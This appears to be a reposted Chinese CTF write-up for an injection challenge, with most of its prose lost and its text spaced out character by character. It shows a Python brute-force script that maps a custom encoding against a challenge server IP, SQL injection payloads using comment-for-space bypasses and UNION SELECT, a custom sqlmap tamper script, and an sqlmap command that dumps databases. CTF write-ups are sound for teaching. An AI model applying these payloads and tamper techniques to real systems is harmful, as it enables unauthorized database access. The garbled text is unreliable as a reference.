[7501] 2021-02-10_一次饶有趣味的CTF注入题

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-17
2021-02-10_一次饶有趣味的CTF注入题 C T F     L i A o R J   F 1 2 s e c   2 0 2 1 - 0 2 - 1 0   # C T F   , 3 2 0 2 1 . 2 . 9 L O L C T F C T F 穿 S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   G u e s t g e t   u s e r = Q g c A Y A b g b w u s e r 使 a d m i n B a s e b a s e 6 4
' ' ' B y   F 1 2 s e c L i A o R J ' ' ' i m p o r t   r e q u e s t s i m p o r t   r e r e g e x     =   r e . c o m p i l e ( r ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   S ' ) f o r   i   i n   r a n g e ( 6 5 , 1 2 3 ) :         f o r   j   i n   r a n g e ( 6 5 , 1 2 3 ) :                 u r l   =   " h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = { } { } " . f o r m a t ( c h r ( i ) , c h r ( j ) )                 r e p o n s e   =   r e q u e s t s . g e t ( u r l = u r l )                 i f   " S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e "   i n   r e p o n s e . t e x t :                         r e p   =   r e . f i n d a l l ( r e g e x , r e p o n s e . t e x t )                         i f     r e p :                                 p r i n t ( u r l )                                 p r i n t ( r e p ) h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = X A [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   a ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = X Q [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   b ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = X g [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   c ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = X w [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   d ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Y A [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   e ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Y Q [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   f ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Y g [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   g ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Y w [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   h ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Z A [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   i ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Z Q [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   j ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Z g [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   k ' ] h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = Z w [ ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   l ' ] . . . . . . . .
a - X A           d - X w           m - a A         i - Z A           n - a Q a d m i n   X A X w a A Z A a Q u s e r X A X w a A Z A a Q       / ? u s e r = X A X w a A Z A a Q 访 s q l i d i d = L A L A 1 s q l 1   o r   1 = 1 # , / * * / 1 / * * / o r / * * / 1 = 1 # h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = X A X w a A Z A a Q & i d = L A K g J Q J Q K g a g b Q K g J Q J Q K g L A O A L A H g . . . . . . . . ' ' ' B y   F 1 2 s e c L i A o R J ' ' ' i m p o r t   r e q u e s t s i m p o r t   r e a n w e r = [ ] r e g e x     =   r e . c o m p i l e ( r ' S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   S ' ) f o r   i   i n   r a n g e ( 6 5 , 1 2 3 ) :         f o r   j   i n   r a n g e ( 6 5 , 1 2 3 ) :                 u r l   =   " h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = { } { } " . f o r m a t ( c h r ( i ) , c h r ( j ) )                 r e p o n s e   =   r e q u e s t s . g e t ( u r l = u r l )                 i f   " S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e "   i n   r e p o n s e . t e x t :                         r e p   =   r e . f i n d a l l ( r e g e x , r e p o n s e . t e x t )                         i f     r e p :                                 a n w e r . a p p e n d ( u r l . r e p l a c e ( " h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = " ,   " " ) )                                 a n w e r . a p p e n d ( r e p [ 0 ] . r e p l a c e ( " S o r r y , y o u   a r e   n o t   a d m i n ! y o u   a r e   " , " " ) )           #   p r i n t ( a n w e r )                                 # c o d e = " " s q l   =   "   o r   1 = 1 # " # t a m p e r   =   [ ' H A ' ,   ' ! ' ,   ' H Q ' ,   ' " ' ,   ' H g ' ,   ' # ' ,   ' H w ' ,   ' $ ' ,   ' I A ' ,   ' % ' ,   ' I Q ' ,   ' & ' ,   ' I g ' ,   " ' " ,   ' I w ' ,   ' ( ' ,   ' J A ' ,   ' ) ' ,   ' J Q ' ,   ' * ' ,   ' J g ' ,   ' + ' ,   ' J w ' ,   ' , ' ,   ' K A ' ,   ' - ' ,   ' K Q ' ,   ' . ' ,   ' K g ' ,   ' / ' ,   # / * * /   K g J Q J Q K g f o r   i   i n   r a n g e ( l e n ( s q l ) ) :         i n d e x   =   t a m p e r . i n d e x ( s q l [ i ] )         c o d e   =   c o d e   +   t a m p e r [ i n d e x - 1 ] p r i n t ( c o d e )
  o r d e r   b y   2   u n i o n   s e l e c t   1 , 2 # 使 v e r s i o n ( ) u s e r ( ) d a t a b a s e ( )
s q l m a p t a m p e r t a m p e r # ! / u s r / b i n / e n v   p y t h o n " " " C o p y r i g h t   ( c )   2 0 0 6 - 2 0 2 0   s q l m a p   d e v e l o p e r s   ( h t t p : / / s q l m a p . o r g / ) S e e   t h e   f i l e   ' L I C E N S E '   f o r   c o p y i n g   p e r m i s s i o n " " " f r o m   l i b . c o r e . c o m p a t   i m p o r t   x r a n g e f r o m   l i b . c o r e . e n u m s   i m p o r t   P R I O R I T Y _ _ p r i o r i t y _ _   =   P R I O R I T Y . L O W d e f   d e p e n d e n c i e s ( ) :         p a s s d e f   t a m p e r ( p a y l o a d ,   * * k w a r g s ) :         " " "         R e p l a c e s   s p a c e   c h a r a c t e r   ( '   ' )   w i t h   c o m m e n t s   ' / * * / '         T e s t e d   a g a i n s t :                 *   M i c r o s o f t   S Q L   S e r v e r   2 0 0 5                 *   M y S Q L   4 ,   5 . 0   a n d   5 . 5                 *   O r a c l e   1 0 g                 *   P o s t g r e S Q L   8 . 3 ,   8 . 4 ,   9 . 0         " " " d e f   t a m p e r ( p a y l o a d ,   * * k w a r g s ) :                     c o d e = " "                 t a m p e r   =   [ ' H A ' ,   ' ! ' ,   ' H Q ' ,   ' " ' ,   ' H g ' ,   ' # ' ,   ' H w ' ,   ' $ ' ,   ' I A ' ,   ' % ' ,   ' I Q ' ,   ' & ' ,   ' I g ' ,   " ' " ,   ' I w ' ,   ' ( ' ,   ' J A ' ,   ' ) ' ,   ' J Q ' ,   ' * ' ,   ' J g ' ,   ' + ' ,   ' J w ' ,   ' , ' ,   ' K A ' ,   ' - ' ,   ' K Q ' ,   ' . ' ,   ' K g '                 f o r   i   i n   r a n g e ( l e n ( p a y l o a d ) ) :                                         i n d e x   =   t a m p e r . i n d e x ( p a y l o a d [ i ] )                                         c o d e   =   c o d e   +   t a m p e r [ i n d e x - 1 ]                 r e t u r n   c o d e p y t h o n 3   s q l m a p . p y   - u   " h t t p : / / 1 0 6 . 5 5 . 2 4 9 . 2 1 3 : 5 0 0 1 / ? u s e r = X A X w a A Z A a Q & i d = L A "   - p   " i d "   - - t a m p e r = r a o g u o . p y   - v   3   - - d b s
b a s e d u m p f l a g
1 7 , l o a d _ f i l e w e b G U I
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则